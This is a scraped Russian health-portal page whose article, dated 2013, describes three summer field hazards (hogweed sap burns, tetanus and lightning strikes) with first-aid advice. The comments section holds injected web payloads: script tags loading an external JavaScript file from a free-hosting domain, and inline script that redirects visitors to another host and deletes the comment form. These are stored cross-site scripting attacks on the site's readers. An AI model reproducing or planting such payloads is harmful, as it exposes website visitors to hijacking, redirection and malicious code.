Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Три опасности в поле  >>  Три опасности в поле
 
Обратная связь
 

Три опасности в поле

Размер шрифта
22 августа 2013 00:00
  • google_analytics: false
  • Нравится

Лето клонится к закату, но немало жарких деньков все еще ждут нас впереди. Самое время выбраться на природу, вкусить аромат полей и лугов нашей необъятной родины. Так-то оно так, но всегда нужно помнить об опасностях, которые могут подстерегать даже в самых райских уголках. Ведь в противном случае можно омрачить свой отдых.

Три опасности в поле

Опасность первая – борщевик

В поле немало растений, которые могут повредить вашу кожу. Некоторые имеют шипы, некоторые вызывают аллергический дерматит. В группе этих вредителей королем является борщевик Сосновского – крупное растение из семейства зонтичных, которое растет вдоль полевых дорог.

Если вы обжигались крапивой, умножьте на сто и получите примерное представление о воздействии борщевика.

Его сок содержит особые вещества – фуранокумарины – которые под действием ультрафиолетовых лучей переходят в активную форму и вызывают самый настоящий химический ожог (1-3 степени)! Особая опасность заключается в том, что прикосновение к растению первое время не вызывает никаких неприятных ощущений.

Что делать?

1. Гуляйте по полю в закрытой одежде (штаны, закрытая обувь, верх с длинным рукавом).

2. Сторонитесь борщевика, как огня!

3. Экстренные меры:

  • Сразу после контакта с соком борщевика следует промокнуть место контакта салфеткой, тщательно и долго промывать его холодной проточной водой.
  • Пораженное место нужно сразу оградить от солнечного света и прятать от него не менее двух дней.
  • Если появились небольшие пузыри, лучше их не трогать, можно наложить асептическую повязку.
  • Если пузырь растет, следует обратиться к врачу, чтобы он в стерильных условиях вскрыл его. После вскрытия и удаления жидкости слой кожи не отрывается, а возвращается на место.
  • На рану необходимо наложить повязку с ранозаживляющим антибактериальным средством.

Опасность вторая – столбняк

Легко представить себе картину: гуляете по полю в сандалиях или даже босиком и вдруг поранили ногу. Например, наступили на гвоздь или осколок стекла. В этом случае кровоточащая рана будет контактировать с почвой, в которой живут клостридии.

Эти бактерии являются убиквитарными условно-патогенными микробами, то есть преспокойно живут в почве практически везде. Но попав через кровоточащую рану в организм, эти микробы выделяют токсин, который вызывает страшное заболевание – столбняк (тетанус – отсюда название микроба Clostridium Tetani).

Сначала эта болезнь проявляется неспецифическими симптомами (температура и так далее), затем возникает спазм жевательных мышц (тризм).

В итоге же происходит спастический паралич всех мышц в организме (опистотонус), в том числе дыхательных, и человек мучительно умирает от удушья.

Что делать?

1. Ходите в поле в штанах и закрытой обуви.

2. Если всё-таки порезались, промойте рану и срочно в медпункт! Там вам введут противостолбнячную сыворотку.

3. Существуют специальные вакцины, которых детей в раннем возрасте прививают в том числе и от столбняка (АКДС – анатоксин коклюшно-дифтерийно-столбнячный, АДС – адсорбированный дифтерийно-столбнячный анатоксин, пентаксим). Взрослым тоже необходимо прививаться – раз в 10 лет.

Опасность третья – удар молнии

Молнии – серьезная угроза для жизни людей. Поражение человека или животного молнией часто происходит на открытых пространствах, так как электрический ток идет по кратчайшему пути «грозовое облако-земля».

В организме пострадавших отмечаются такие же патологические изменения, как при поражении электротоком. Жертва теряет сознание, падает, могут отмечаться судороги, ожоги. На теле обычно можно обнаружить «метки тока», места входа и выхода электричества.

Смерть нередко связана с тяжелыми аритмиями: молния нарушает электрическую работу сердца.

Что делать?

1. Если вы оказались в грозу на открытой местности и не имеете возможности спрятаться в здании или машине, то отходите подальше от отдельно стоящих деревьев и высоких строений. Избегайте холмов и других возвышенностей. Находиться под группой из нескольких деревьев более безопасно, чем на открытой местности. Если поблизости есть канава, то прячьтесь в ней. Избавьтесь от металлических предметов. Если вам не удалось найти укрытие, то присядьте на корточки и обхватите руками колени.

2. Если человека ударила молния, необходимо срочно вызвать скорую помощь и приступать к сердечно-легочной реанимации.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Все что надо знать о бронхите   Ученые выяснили, что случится с вами, если вас удалят из друзей Вконтакте!   Вся правда о соплях   Мужчины против женщин. Кто лучше?  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как вернуться живым из отпуска
Странные сигналы вашего организма
Как снова хотеть секса

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.